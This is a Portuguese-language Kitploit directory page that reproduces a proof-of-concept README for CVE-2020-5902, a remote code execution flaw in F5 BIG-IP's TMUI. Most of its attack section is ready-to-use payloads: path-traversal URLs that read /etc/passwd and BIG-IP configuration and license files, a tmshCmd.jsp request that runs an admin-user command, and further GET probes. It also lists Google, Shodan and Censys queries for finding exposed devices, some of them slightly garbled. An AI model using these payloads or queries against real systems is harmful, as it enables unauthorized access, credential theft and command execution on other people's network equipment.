Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-5902 — Exploit de prova de conceito para o CVE-2020-5902, uma vulnerabilidade de execução remota de código no F5 BIG-IP TMUI, com payloads de leitura de arquivos e execução de comandos e consultas de reconhecimento para Shodan e Censys. | Kitploit
Ferramentas/GitHubGitHub/dnerzker/cve-2020-5902
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de Informações
GitHubdnerzker/cve-2020-5902

CVE-2020-5902

Exploit de prova de conceito para o CVE-2020-5902, uma vulnerabilidade de execução remota de código no F5 BIG-IP TMUI, com payloads de leitura de arquivos e execução de comandos e consultas de reconhecimento para Shodan e Censys.

Ver Repositório
há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-5902

Resumo

Nas versões 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 e 11.6.1-11.6.5.1 do BIG-IP, a Interface de Usuário de Gerenciamento de Tráfego (TMUI), também conhecida como utilitário de Configuração, possui uma vulnerabilidade de Execução Remota de Código (RCE) em páginas não divulgadas.

Prova de Conceito

root@kitploit:~
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin 
root@kitploit:~
 	GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
	GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=randomstuff
	GET /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp 
	GET /tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=AnyMsgHereWillBeReflectedInTheResponse

inurl://"tmui/login.jsp"
intitle://"BIG-IP" inurl://"tmui"

~~ Try use the following queries for shodan:
	1. F5-login-pages
	2. www-authenticate: Basic realm:BIG-IP
	3. BigIP / BIG-IP
	4. htt.favicon.hash:-335242539
	5. http.title:"BIG-IP&req:- Redirect"
~~ Try use the following queries for censys:
	1.433.https.get.body_sha256:5d78eb6fa93b995f9af90b632f0016e80dbcda8eb71a17994678692585ee5
	2.433.https.get.title:"BIG-IP&req:- Redirect" 

##Olá##

root@kitploit:~
i'm Rizki Ardian
how are you today??  
Baixar ferramenta